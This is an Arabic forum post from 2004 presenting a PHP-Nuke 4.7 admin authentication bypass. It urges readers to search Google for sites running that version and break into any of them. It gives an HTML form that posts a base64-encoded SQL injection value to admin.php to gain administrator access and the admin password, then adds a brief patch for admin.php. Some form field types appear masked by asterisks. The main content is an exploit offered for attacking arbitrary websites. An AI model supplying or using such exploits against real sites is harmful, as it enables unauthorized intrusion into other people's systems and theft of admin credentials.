اتصل بنا البحث up a3ln usercp home
 


العودة   ::. مـنتدى قبيلـة العجمـان .:: > الـمنتديات العـلمية والتقنية > :: مـنتدى الـكمبيوتــر والاتصـالات ::

 
 
أدوات الموضوع انواع عرض الموضوع
  #1  
قديم 22-11-2004, 10:28 AM
goldskull goldskull غير متواجد حالياً
Banned
 
تاريخ التسجيل: Oct 2004
الدولة: كــــــــــــ Q8ــــــــويـــــــــــــQ8ـــــــت
المشاركات: 335
ثغرة في php nuke 4.7

بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاتة
كما عودتكم لازم موضوع جديد
الحمد لله خذينا الموضوع هذا من احد مواقع السكرتي الأجنبية وترجمناه ووسهلنا عليكم الاختراق هذي ثغرة في اصدار النيوك 4.7

نبدا الشرح
اولا نروح احد محركات البحث
www.google.com
www.yahoo.com
www.av.com

ونكتب فية للبحث العشوائي للي ما عندة موقع يخترقة
php nuke 4.7
وبعيدن تطلع النتايج عاد عد كم موقع تقدر تخترقة بس مو كلهم ممكن بعضهم سادين الثغرة بس نجرب يا سلام شلون نخترقهم انا اقول لكم

اعمل صفحة html باي طريقية عن طريق الفرونت بيج عن طريق موقع عن طريق الكاتب اي شي المهم تسوي صفحة تكون فيها الاوامر هذي

كود:
<form name="mantra" method="POST" 
action="http://www.sitewithphpnuke.com/admin.php"> 
  <p>TITLE: 
    <input type="********" name="add_title"> 
    <br> 
    CONTENT: 
    <********area name="add_content" rows=10 cols=50></********area> 
    <br> 
    DATE: 
    <input type="********" name="add_mdate"> 
    <br> 
    E-MAIL: 
    <input type="********" name="add_expire"> 
    <br> 
<input type="hidden" name="add_expire" value="0"> 
    <br> 
<input type="hidden" name="add_active" value="1"> 
    <br> 
<input type="hidden" name="add_view" value="1"> 
    <br> 
   <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"> 
    <br> 
    <input type="hidden" name="add_radminsuper" value="1"> 
    <br> 
    <input type="hidden" name="op" value="addmsg"> 
  </p> 
  <p> 
    <input type="submit" name="Submit" value="Post this message"> 
    <br> 
  </p> 
</form>
الحين سجل الملف وافتحة وراح تحصل الباسورد حق مدير الموقع يلا عاد العب في الموقع لعب

===============================
سد الثغرة الاهم
ضعه في ملف admin.php


كود:
Apply this code to your admin.php file: 

if ( !empty($HTTP_GET_VARS['admin']) ) { 
   die("Shit! Mantra wins =)"); 
} 

if ( !empty($HTTP_POST_VARS['admin']) ) { 
   die("Shit! Mantra wins =)"); 
}

تحياتي
goldskull
الجمجمة الذهبية
ترقبوا كل جديد منا ان شاء الله

رد مع اقتباس
 


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

الساعة الآن 01:35 AM.


Powered by vBulletin® Version 3.8.0, Copyright ©2000 - 2026, Jelsoft Enterprises Ltd. TranZ By Almuhajir
Design And Develop By DevelopWay

تصميم : طريق التطوير
لحلول الإنترنت والتصميم DevelopWay.com